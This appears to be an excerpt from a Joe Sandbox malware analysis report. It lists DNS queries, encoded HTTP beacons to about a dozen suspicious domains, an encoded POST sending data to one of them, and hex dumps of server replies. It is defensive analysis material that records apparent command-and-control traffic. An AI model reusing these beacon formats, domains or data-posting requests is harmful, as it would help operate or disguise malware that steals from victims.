                    Source: Joe Sandbox ViewASN Name: ACPCA ACPCA
                    Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                    Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /cs9k/?QhKxhNP=W7SiLeR8lVOS0IddzXWoYXDt6RHub9Z/llH5xMN7IPTa857c9EQRUjsfmtg32BbwdcsWIPqYG66ejHdS265gpP2tZDtQplym5WCIjSXUngUJeAz/nR33NA1XQvWBI8EpRg==&Yby=d2ydCtHpb8 HTTP/1.1Host: www.holytur.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                    Source: global trafficHTTP traffic detected: GET /30le/?QhKxhNP=jHE7b6Z9ED1A0Je7bwo+kjGjstTykwGZjMkqHVfcjQ95lgOzDj3OOkgun9YTkzFADI0DOvoxgj3LN5jGlHy+CHSERWGJqvHJseYAxerz13ZcR6Qaw8dlP7tGoG6xZXENiQ==&Yby=d2ydCtHpb8 HTTP/1.1Host: www.nieuws-july202488.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                    Source: global trafficHTTP traffic detected: GET /s15n/?QhKxhNP=JfQJqlQL4YuujxfZFicS9Y3zSvzh5uc29LPY+3nQdNuELRDWQb2uefNArAI9Jzm+wUv6iBr2b0gwhreB6wQHxTYP3MQRZc2DBo1D75Es8xJLJq3ZosxOeO3P23AwVQ3aXA==&Yby=d2ydCtHpb8 HTTP/1.1Host: www.losmason.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                    Source: global trafficHTTP traffic detected: GET /yf1h/?QhKxhNP=YVpI46H16R/w/kk1bY6rBRavyZUbsgJtp9CZM+Bxvkr6dioDBNQhLHAnFkN0G7WaNsS3kDmK0ayEpl6TGabHmNyPQwWjM0ybC5bIBemWzNbXvkTcX815xQrmtulGFojAfQ==&Yby=d2ydCtHpb8 HTTP/1.1Host: www.hayaniya.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                    Source: global trafficHTTP traffic detected: GET /rxts/?Yby=d2ydCtHpb8&QhKxhNP=UMqd3Rr/GgjcpDtMifF0hAVXULwugGyaJHdfF0vXYxuoY8NmwcRKHFRQ3Zc522gmFWLmVhpOr5FlbfkrODlmL/pMmEFBmvtdQsTPBX/BeC8bc9YX4gHB5yTSGVyOHdtWew== HTTP/1.1Host: www.lovel.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                    Source: global trafficHTTP traffic detected: GET /zs4o/?QhKxhNP=40yvXZqQXwyOFTl0d1fxwhQGTsZjKCC3JWjHJEZ8IBZutO+YSqvvwioh1RBVRKlMIRVxucUqEMWgr+FAgfZYoR4vWuFQr4uBZgu5x5JrNmZwlLDog/JQkd5M42bUbwrevw==&Yby=d2ydCtHpb8 HTTP/1.1Host: www.duskgazes.workAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                    Source: global trafficHTTP traffic detected: GET /xyvr/?Yby=d2ydCtHpb8&QhKxhNP=Dk/wQKBXq4hP/zVb9ApyZmDkyzbQqrM0hWgYI5VbiKGV4GeQY6os12Lf5EdpuHYA6f15h+K7XFjq1wIjorrCnH6ZrrhC9s12l00lNHx4+XmTSfuGU54Az/E2dcdiA+66+g== HTTP/1.1Host: www.zrinorem-srumimit.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                    Source: global trafficHTTP traffic detected: GET /dnjw/?QhKxhNP=LLuahgeFNd50MfmeR+YO4X7oQIpbAv675x2tVSlUIoVemPDFIi7IcWvJHwj84u5Zt+Ov/a/NakHy5HK7jRYViNkqfDz6ShsEoBWZb9ZpzTMPTjlue++bzVqPhWzfo/q89w==&Yby=d2ydCtHpb8 HTTP/1.1Host: www.6822662.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                    Source: global trafficHTTP traffic detected: GET /404o/?QhKxhNP=WKBQtURp4mxoG42HvJVFdxkBeoRQKLcKkncaZCQ6BKNKWWSe5DM6Y469mdl3/OFUlQwZCGrNWgxnPoxBbE5j38LAsK6uFZ8oMmHn4Vx5wOob/Qku77DXil1QxQESxukZTQ==&Yby=d2ydCtHpb8 HTTP/1.1Host: www.lingdianyun29.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                    Source: global trafficHTTP traffic detected: GET /d5up/?QhKxhNP=t4sGAbB2VavWqiiIadPUj68mTJ7Q54MapR6mUVHY3SwgNZVHyOwsTaauiAAffAhHdKJKrrjT+NERuNHfq0vx0hlOGr9kxI5wEfZ1g7ObOVlc/eoN6Msnk6zs6578MLwdAQ==&Yby=d2ydCtHpb8 HTTP/1.1Host: www.learnnow.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                    Source: global trafficHTTP traffic detected: GET /jcsf/?QhKxhNP=NJIOohqps9aNaGk8Gv0x95TXV1ke4jY2ru9PIld0z7+iuCSmXzhmM46cxc5xGqvTMH7YV8ukdWwIlgb06ERZu+HhQde6PspHhBqQKwPZwv/EXFgjFQrkOjXlWxa7+IRGPg==&Yby=d2ydCtHpb8 HTTP/1.1Host: www.carpentry.clubAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                    Source: global trafficHTTP traffic detected: GET /cfqm/?QhKxhNP=FHiNz6b6Wn9oKec3i10x/NxXWu4/t8kjzDy3bn44oOFoUWscXE4DzqYFgJdNnLXTrdZ+ESI+3Oq4E1BzotELfZv0FR4L9xniphkEx7BDvvGrYDhvMkPmWTEebCLVzsH5Qg==&Yby=d2ydCtHpb8 HTTP/1.1Host: www.030002449.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                    Source: global trafficHTTP traffic detected: GET /4ia5/?Yby=d2ydCtHpb8&QhKxhNP=oT6nzMsk5LGNbZnpqYupld8IqKtrWX3IcFzU22s19J/vOzFqssjWYMTSR1XNlBsCMk+VGX4Yc+V3gPgjU/YcbzdAUc79Tjp71o7bTfkvAIZVHxyoJSYvjU3Ey8bm4rBe7Q== HTTP/1.1Host: www.innovationpulse.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                    Source: global trafficDNS traffic detected: DNS query: www.holytur.net
                    Source: global trafficDNS traffic detected: DNS query: www.nieuws-july202488.sbs
                    Source: global trafficDNS traffic detected: DNS query: www.losmason.shop
                    Source: global trafficDNS traffic detected: DNS query: www.hayaniya.org
                    Source: global trafficDNS traffic detected: DNS query: www.lovel.shop
                    Source: global trafficDNS traffic detected: DNS query: www.duskgazes.work
                    Source: global trafficDNS traffic detected: DNS query: www.zrinorem-srumimit.sbs
                    Source: global trafficDNS traffic detected: DNS query: www.6822662.xyz
                    Source: global trafficDNS traffic detected: DNS query: www.lingdianyun29.xyz
                    Source: global trafficDNS traffic detected: DNS query: www.learnnow.info
                    Source: global trafficDNS traffic detected: DNS query: www.carpentry.club
                    Source: global trafficDNS traffic detected: DNS query: www.030002449.xyz
                    Source: global trafficDNS traffic detected: DNS query: www.innovationpulse.tech
                    Source: global trafficDNS traffic detected: DNS query: www.hasan.cloud
                    Source: unknownHTTP traffic detected: POST /30le/ HTTP/1.1Host: www.nieuws-july202488.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usAccept-Encoding: gzip, deflateConnection: closeContent-Length: 208Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedOrigin: http://www.nieuws-july202488.sbsReferer: http://www.nieuws-july202488.sbs/30le/User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30Data Raw: 51 68 4b 78 68 4e 50 3d 75 46 73 62 59 4b 78 69 4a 78 59 70 67 4a 65 35 64 58 45 46 70 45 32 49 67 50 58 47 6e 79 32 78 79 75 35 31 50 58 53 64 68 46 6b 49 6a 7a 62 30 4f 54 36 2b 4c 6c 6c 35 6d 35 55 59 7a 51 42 71 66 36 6b 4e 52 4f 55 61 76 56 37 73 4f 6f 62 68 69 6d 4b 30 65 6b 6e 49 41 6b 2b 69 6c 36 61 65 6e 4d 49 76 38 64 50 43 31 32 4a 4e 65 70 30 36 32 2f 70 35 4c 59 74 65 6f 6e 69 44 56 6c 31 35 67 45 67 44 79 45 6c 2b 32 38 41 58 51 6f 33 32 75 30 48 7a 53 4b 6f 78 79 72 51 71 38 66 62 43 53 75 45 52 34 56 6a 65 73 6f 56 4c 6c 4c 44 74 45 67 43 59 76 34 42 71 41 46 4a 34 6f 2f 6f 47 75 58 44 52 4c 37 51 3d Data Ascii: QhKxhNP=uFsbYKxiJxYpgJe5dXEFpE2IgPXGny2xyu51PXSdhFkIjzb0OT6+Lll5m5UYzQBqf6kNROUavV7sOobhimK0eknIAk+il6aenMIv8dPC12JNep062/p5LYteoniDVl15gEgDyEl+28AXQo32u0HzSKoxyrQq8fbCSuER4VjesoVLlLDtEgCYv4BqAFJ4o/oGuXDRL7Q=
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 28 Nov 2024 08:13:51 GMTContent-Type: text/html; charset=UTF-8Content-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Thu, 28 Nov 2024 08:14:09 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f 18 87 a9 7b 1f b8 a1 1f 54 60 f8 2b 81 91 c3 31 4a 60 93 f7 b3 2c d3 8e fc a2 97 01 98 28 ce 8a 87 c1 3f 7b 97 f6 7e da eb 18 36 c5 31 1c 79 3f 96 9b 8e 13 a6 fe c3 e0 a6 3f 31 0b 3f 4c df 75 ff e7 77 f6 4b d7 ae c2 2c fd 02 44 cf 2a b7 b8 d1 87 13 96 79 6c 02 5d 58 71 66 47 ff 07 db 7d ed f1 67 02 8d dc ee f4 cc e4 7d ec 7a 40 4b 66 5d 65 ef 37 7b 19 2e 9e b5 f8 e3 f8 9b ec 03 14 b9 b6 c0 9b a4 5f 01 22 f3 2c 2d dd fb 30 f5 b2 1b 41 5f f5 ca 5c da db de 57 cb cb ca ac ea 12 58 c7 71 6f 16 5f 50 f3 6c fe 21 82 fc cb 1f ad 2e 5c b3 cc d2 cf d7 63 c3 eb f5 3d 24 3f 33 c1 15 67 17 9d da d5 45 ae 2f df 2d 0b e4 ed f7 ba ef 03 c5 cd 86 af d2 22 97 f6 21 bf 3d 96 7a 60 00 c7 fb 40 5d 57 68 2d dc dc 35 81 cd 40 18 79 fe f9 46 ae 67 ff 6a e6 eb ae d8 04 a7 08 ea fd b4 d7 b1 e9 a5 bd 8d 5d 49 79 cb 91 f9 89 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f ae 14 a6 6f ae 3c c1 3f 01 da b5 3d 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f c2 f6 fa ba c2 12 3a ba 1e bc d2 c4 3b fa b7 6a e8 cd 7d ef b8 76 56 98 bd fd 1e 06 20 a4 b8 45 1f 84 de 6f f4 aa 71 10 8f 68 e6 ca 1a 9f ee f3 10 64 8d 5b 5c e1 eb 3d 1b 0f 5e 66 d7 e5 e7 c3 26 88 33 cd ad e7 bc 32 81 51 23 62 32 7a 63 f0 8a 89 cf 51 fc 1a d7 3e 32 d4 2f a8 b1 8e 6f 6c f3 dd d3 c2 f4 12 b3 3f 88 79 71 58 56 f7 97 b4 d2 03 3e 75 07 59 5d 95 21 08 08 fd c7 1b fb bd 21 5f b9 bb 09 c6 df e1 75 d5 ff 26 2d e0 29 0e 6f d8 f2 e2 ac f7 af 3e 32 be df e1 62 69 33 0e 7d 60 64 1b 9c 10 dc e2 6d fc 8d e4 d7 1b bf 79 01 fd 47 3b 5d 12 2e c8 51 9f c5 b0 3e 10 dc 87 89 e9 df 9a f1 bb 50 9f c6 de cb d2 fe 94 03 12 d4 ad 7c 7d ce 6d 5f f2 a3 95 c5 ce 9b 14 bd 1e af a5 fc 51 07 6d 56 38 f7 16 c0 48 04 72 54 ff e7 de 8c e3 f7 04 7e 49 2a 90 d4 01 b8 07 40 57 20 4b d
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Thu, 28 Nov 2024 08:14:12 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 43 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f 18 87 a9 7b 1f b8 a1 1f 54 60 f8 2b 81 91 c3 31 4a 60 93 f7 b3 2c d3 8e fc a2 97 01 98 28 ce 8a 87 c1 3f 7b 97 f6 7e da eb 18 36 c5 31 1c 79 3f 96 9b 8e 13 a6 fe c3 e0 a6 3f 31 0b 3f 4c df 75 ff e7 77 f6 4b d7 ae c2 2c fd 02 44 cf 2a b7 b8 d1 87 13 96 79 6c 02 5d 58 71 66 47 ff 07 db 7d ed f1 67 02 8d dc ee f4 cc e4 7d ec 7a 40 4b 66 5d 65 ef 37 7b 19 2e 9e b5 f8 e3 f8 9b ec 03 14 b9 b6 c0 9b a4 5f 01 22 f3 2c 2d dd fb 30 f5 b2 1b 41 5f f5 ca 5c da db de 57 cb cb ca ac ea 12 58 c7 71 6f 16 5f 50 f3 6c fe 21 82 fc cb 1f ad 2e 5c b3 cc d2 cf d7 63 c3 eb f5 3d 24 3f 33 c1 15 67 17 9d da d5 45 ae 2f df 2d 0b e4 ed f7 ba ef 03 c5 cd 86 af d2 22 97 f6 21 bf 3d 96 7a 60 00 c7 fb 40 5d 57 68 2d dc dc 35 81 cd 40 18 79 fe f9 46 ae 67 ff 6a e6 eb ae d8 04 a7 08 ea fd b4 d7 b1 e9 a5 bd 8d 5d 49 79 cb 91 f9 89 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f ae 14 a6 6f ae 3c c1 3f 01 da b5 3d 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f c2 f6 fa ba c2 12 3a ba 1e bc d2 c4 3b fa b7 6a e8 cd 7d ef b8 76 56 98 bd fd 1e 06 20 a4 b8 45 1f 84 de 6f f4 aa 71 10 8f 68 e6 ca 1a 9f ee f3 10 64 8d 5b 5c e1 eb 3d 1b 0f 5e 66 d7 e5 e7 c3 26 88 33 cd ad e7 bc 32 81 51 23 62 32 7a 63 f0 8a 89 cf 51 fc 1a d7 3e 32 d4 2f a8 b1 8e 6f 6c f3 dd d3 c2 f4 12 b3 3f 88 79 71 58 56 f7 97 b4 d2 03 3e 75 07 59 5d 95 21 08 08 fd c7 1b fb bd 21 5f b9 bb 09 c6 df e1 75 d5 ff 26 2d e0 29 0e 6f d8 f2 e2 ac f7 af 3e 32 be df e1 62 69 33 0e 7d 60 64 1b 9c 10 dc e2 6d fc 8d e4 d7 1b bf 79 01 fd 47 3b 5d 12 2e c8 51 9f c5 b0 3e 10 dc 87 89 e9 df 9a f1 bb 50 9f c6 de cb d2 fe 94 03 12 d4 ad 7c 7d ce 6d 5f f2 a3 95 c5 ce 9b 14 bd 1e af a5 fc 51 07 6d 56 38 f7 16 c0 48 04 72 54 ff e7 de 8c e3 f7 04 7e 49 2a 90 d4 01 b8 07 40 57 20 4b d
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Thu, 28 Nov 2024 08:14:14 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 72 e3 48 72 fe 3f 4f 41 cb 61 7b 37 d0 6a 9c 24 41 ad d4 bb b8 08 80 24 40 00 24 48 82 0e c7 04 6e 80 38 89 9b dc f0 03 f9 35 fc 64 2e 50 52 8b 62 4b d3 bd 0e ff 70 cd 44 88 a8 23 2b 8f 2f 33 ab 2b eb b7 df 7e 7b fc 27 76 c9 ac 0d 85 1b 04 55 12 7f fb ed f1 f9 cf 00 b4 c7 c0 35 9d 6f bf 5d 7e 26 6e 65 82 19 55 7e ef 1e eb b0 79 ba 63 b2 b4 72 d3 ea be 3a e5 ee dd c0 7e fe 7a ba ab dc ae 82 7b 12 7f 19 d8 81 59 94 6e f5 54 57 de 3d 79 f7 29 1d d3 0e dc fb 7e 7d 91 c5 57 84 d2 ec de ee 87 3e 5d a8 14 a6 9f 98 ff c8 0a ae cb c3 c2 2d af 96 20 ef a8 a7 66 e2 3e dd 35 a1 db e6 59 51 5d 4d 6b 43 a7 0a 9e 1c b7 09 6d f7 fe f2 f1 65 10 a6 61 15 9a f1 7d 69 9b b1 fb 84 7e fd 4e aa 0a ab d8 fd 46 20 c4 40 ce aa c1 34 ab 53 e7 11 7e ee 7c 56 65 59 9d 62 77 d0 eb ed 45 5d 76 59 be f0 d1 ab da ca 9c d3 e0 ef 97 a9 fd 67 df 3c a0 9d 7b cf 4c c2 f8 f4 30 a0 0a b0 ed 97 81 e0 c6 8d 5b 85 b6 f9 65 50 9a 69 79 5f ba 45 e8 fd e5 c7 65 65 78 76 1f 06 28 91 77 ef 07 e3 30 75 ef 03 37 f4 83 0a 0c 7f 25 30 72 38 46 09 6c f2 7e 96 65 da 91 5f f4 32 00 13 c5 59 f1 30 f8 67 ef d2 de 4f 7b 1d c3 a6 38 86 23 ef c7 72 d3 71 c2 d4 7f 18 dc f4 27 66 e1 87 e9 bb ee ff fc ce 7e e9 da 55 98 a5 5f 80 e8 59 e5 16 37 fa 70 c2 32 8f 4d a0 0b 2b ce ec e8 ff 60 bb af 3d fe 4c a0 91 db 9d 9e 99 bc 8f 5d 0f 68 c9 ac ab ec fd 66 2f c3 c5 b3 16 7f 1c 7f 93 7d 80 22 d7 16 78 93 f4 2b 40 64 9e a5 a5 7b 1f a6 5e 76 23 e8 ab 5e 99 4b 7b db fb 6a 79 59 99 55 5d 02 eb 38 ee cd e2 0b 6a 9e cd 3f 44 90 7f f9 a3 d5 85 6b 96 59 fa f9 7a 6c 78 bd be 87 e4 67 26 b8 e2 ec a2 53 bb ba c8 f5 e5 bb 65 81 bc fd 5e f7 7d a0 b8 d9 f0 55 5a e4 d2 3e e4 b7 c7 52 0f 0c e0 78 1f a8 eb 0a ad 85 9b bb 26 b0 19 08 23 cf 3f df c8 f5 ec 5f cd 7c dd 15 9b e0 14 41 bd 9f f6 3a 36 bd b4 b7 b1 2b 29 6f 39 32 3f 11 ea d7 49 dc 87 95 9b 94 37 64 be 23 09 03 38 fa c1 95 c2 f4 cd 95 27 f8 27 40 bb b6 c7 0d f5 17 1c 5b 59 55 65 c9 c3 a0 df e3 4d d8 5e 5f 57 58 42 47 d7 83 57 9a 78 47 ff 56 0d bd b9 ef 1d d7 ce 0a b3 b7 df c3 00 84 14 b7 e8 83 d0 fb 8d 5e 35 0e e2 11 cd 5c 59 e3 d3 7d 1e 82 ac 71 8b 2b 7c bd 67 e3 c1 cb ec ba fc 7c d8 04 71 a6 b9 f5 9c 57 26 30 6a 44 4c 46 6f 0c 5e 31 f1 39 8a 5f e3 da 47 86 fa 05 35 d6 f1 8d 6d be 7b 5a 98 5e 62 f6 07 31 2f 0e cb ea fe 92 56 7a c0 a7 ee 20 ab ab 32 04 01 a1 ff 78 63 bf 37 e4 2b 77 37 c1 f8 3b bc ae fa df a4 05 3c c5 e1 0d 5b 5e 9c f5 fe d5 47 c6 f7 3b 5c 2c 6d c6 a1 0f 8c 6c 83 13 82 5b bc 8d bf 91 fc 7a e3 37 2f a0 ff 68 a7 4b c2 05 39 ea b3 18 d6 07 82 fb 30 31 fd 5b 33 7e 17 ea d3 d8 7b 59 da 9f 72 40 82 ba 95 af cf b9 ed 4b 7e b4 b2 d8 79 93 a2 d7 e3 b5 94 3f ea a0 cd 0a e7 de 02 18 89 40 8e ea ff dc 9b 71 fc 9e c0 2f 49 05 92 3a 00 f7 00 e8 0a 64 8
